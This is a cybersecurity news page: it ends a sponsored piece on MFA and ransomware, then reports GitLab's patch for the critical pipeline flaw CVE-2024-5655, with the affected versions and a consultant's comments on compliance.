The dramatic rise in ransomware payments is a stark reminder of the evolving cyber threat landscape and the urgent need for improved security measures. The failings of twenty-year-old legacy MFA systems are the leading contributing factor in this alarming trend. As cyberattacks become more sophisticated, specifically with the use of Generative AI to create highly convincing phishing messages, organizations must move beyond outdated security practices and embrace next-generation MFA technologies. By adopting advanced authentication methods, implementing adaptive security measures, and ensuring seamless integration with their security infrastructure, organizations can significantly enhance their defense against ransomware attacks. The transition to phishing-resistant, next-generation MFA is not just a technological upgrade; it is a strategic imperative for safeguarding critical data, reducing the risk of catastrophic financial loss, and ensuring operational resilience in the face of escalating cyber threats. In the battle against ransomware, the message is clear: legacy MFA systems are no longer sufficient.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

How MFA Failures are Fueling a 500% Surge in Ransomware Losses

The company is urging users running vulnerable versions to patch CVE-2024-5655 immediately, to avoid CI/CD malfeasance.

Source: Bill Crump via Alamy Stock Photo

A critical GitLab vulnerability could allow an attacker to run a pipeline as another user.

GitLab is a popular Git repository, second only to GitHub, with millions of active users. This week, it released new versions of its Community (open source) and Enterprise Editions.

The updates include fixes for 14 different security issues, including cross site request forgery (CSRF), cross site scripting (XSS), denial of service (DoS), and more. One of the issues is deemed of low severity according to the Common Vulnerability Scoring System (CVSS), nine are of medium severity, and three are high — but there's also one critical bug with a CVSS score of 9.6 out of 10.

**CVE-2024-5655 Offers Critical Threat to Code Development**

That critical one, CVE-2024-5655, affects GitLab versions starting from 15.8 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, according to the company. It enables an attacker to trigger a pipeline as another user, but only under circumstances which GitLab did not elaborate on (nor did it provide any other information about the vulnerability).

A pipeline automates the process of building, testing, and deploying code in GitLab. Theoretically, an attacker with the ability to run pipelines as other users can access their private repositories, and manipulate, steal, or exfiltrate sensitive code and data contained therein.

Unlike with CVE-2023-7028 — a 10 out of 10 account takeover bug known to have been exploited earlier this Spring — GitLab has thus far found no evidence of CVE-2024-5655 exploits in the wild. Though, that could quickly change.

**A Compliance Issue, Not Just Security**

 Issues rooted deep in the development process like CVE-2024-5655 can sometimes cause headaches beyond the simple risk they pose on paper.

"In a worst-case scenario, this vulnerability doesn't even have to be exploited to cost companies money in lost revenue," says Jamie Boote, associate principal consultant at Synopsys Software Integrity Group. The mere fact that a software or software-driven product was built using a vulnerable version of GitLab could itself be cause for concern.

"Pipeline vulnerabilities like this can not only pose a security risk but a regulatory and compliance risk as well. As US companies are working towards compliance with the Self-Attestation Form requirements that they need to meet to sell software and products to the US Government, not addressing this vulnerability could lead to a compliance gap which could put sales and contracts at risk," he explains. In particular, he points to line item 1c in Section III of the US Department of Commerce's Secure Software Development Attestation Form Instructions, which requires "Enforcing multi-factor authentication and conditional access across the environments relevant to developing and building software in a manner that minimizes security risk."

"Compliance with item 1c is in jeopardy for companies who don't address this vulnerability as an exploit would allow attackers to bypass those conditional access controls that companies are relying on for compliance," he concludes.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Tag

#csrf